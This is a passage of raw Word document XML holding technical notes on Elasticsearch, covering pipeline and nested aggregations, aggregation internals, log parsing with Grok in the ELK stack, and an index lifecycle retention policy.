        <w:t xml:space="preserve">    "restaurants within 1km, 5km, 10km"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D8B26E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224207F8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Pipeline aggregations (compute over aggregation results):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A387F0C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  moving_avg: moving average over date_histogram buckets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446ED3EA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  derivative: rate of change between buckets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC488B4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  cumulative_sum: running total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BD5349" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  bucket_sort: sort and limit buckets by metric value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A30CE97" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D72641A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Nested aggregations (aggregations within aggregations):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38770CD7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  GET /orders/_search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A347450" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595F0398" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "aggs": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D19B297" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      "by_category": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE51290" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "terms": { "field": "category", "size": 10 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6805F1A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "aggs": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4713AD17" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          "revenue": { "sum": { "field": "amount" } },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E43202" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          "avg_order": { "avg": { "field": "amount" } },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455F4AB9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          "by_month": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C2666F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "date_histogram": { "field": "date", "calendar_interval": "month" },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E09841" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "aggs": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3DA6B1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">              "monthly_revenue": { "sum": { "field": "amount" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A30AD2B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08700E6F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE67A8F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF8AFAB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6878064A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F96368C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B787C1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDFCA5C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Result: top 10 categories, each with total revenue, average order,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1362FDB2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          and monthly breakdown of revenue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB5A13" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AB5E85" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  This query executes across all shards in parallel, merges at coordinator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4056096E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  For 100M order documents: typically executes in &lt; 1 second on adequate hardware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB49721" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  (where equivalent SQL GROUP BY might take minutes on a single database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E16A27C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="15642C31" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Aggregation internals — why they're fast:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F000FAB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Doc values: columnar field storage (separate from inverted index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0065F1FC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Stored as sorted arrays on disk, memory-mapped</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201025F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    CPU-efficient: SIMD instructions can process many values simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC4EEB2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    No deserialization overhead: values stored in native format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D061861" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE2026D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Global ordinals: pre-computed term → integer mapping for terms aggregations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4283EA7C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "electronics" → 0, "clothing" → 1, "sports" → 2 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C77D8C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Aggregation works on integers (fast) then maps back to terms (once)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55285048" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069CADA1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Field data cache: doc values for text fields in memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDBA4D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Trade-off: memory consumption vs aggregation speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A0FA61" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ELK Stack — Log Analytics Use Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB25659" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A75884" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Elasticsearch's most common deployment: centralized log management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFBA509" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="7CF6FF04" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Data flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA237DD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Applications → [Filebeat/Fluentd/Logstash] → Elasticsearch → [Kibana dashboards]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C45D30E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE9BA7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Logstash/Filebeat: log collection and parsing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646607CB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Tail log files, receive syslog/TCP/UDP streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3945E471" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Parse unstructured log lines into structured fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495999E4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D71ADAD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Input: "2024-01-15 10:30:45 ERROR UserService Request timeout after 30s user_id=12345"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D208443" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437EE3F1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Grok pattern (regex-based field extraction):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FB7A13" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      %{TIMESTAMP_ISO8601:timestamp} %{LOGLEVEL:level} %{WORD:service} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B872FD3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      %{GREEDYDATA:message} user_id=%{NUMBER:user_id:int}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C42947C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414722ED" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Output JSON:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6113BBAE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D13FD64" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "timestamp": "2024-01-15T10:30:45Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ECD6D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "level": "ERROR",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FAFD6E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "service": "UserService",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D91A17" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "message": "Request timeout after 30s user_id=12345",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CA8F83" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "user_id": 12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F08669" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77611A3F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="6338D440" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Index lifecycle management (ILM) for log retention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163394B6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Hot phase (0-2 days):    high-performance nodes, all writes, active search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DCCE73" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Warm phase (2-30 days):  mid-tier nodes, read-only, compressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E904CB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Cold phase (30-90 days): low-cost nodes, rarely accessed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E69B29D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Frozen phase (90+ days): object storage (S3), on-demand access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F62D31" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Delete phase (&gt; 90 days): automatic index deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3089E3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3326C88B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  PUT _ilm/policy/logs_policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E858BB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A0EEC6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "policy": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF5110D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      "phases": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9BE196" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "hot":   {"actions": {"rollover": {"max_size": "50gb", "max_age": "1d"}}},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502A045E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "warm":  {"min_age": "2d",  "actions": {"shrink": {"number_of_shards": 1}, "forcemerge": {"max_num_segments": 1}}},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F671EC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "cold":  {"min_age": "30d", "actions": {"freeze": {}}},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677D5A86" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "delete":{"min_age": "90d", "actions": {"delete": {}}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F06C72E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52141D41" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B335E1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E26EED3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="76A4F8AE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Data streams (modern log indices):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E517DC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Time-series data (logs, metrics, events) → data streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD11516" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
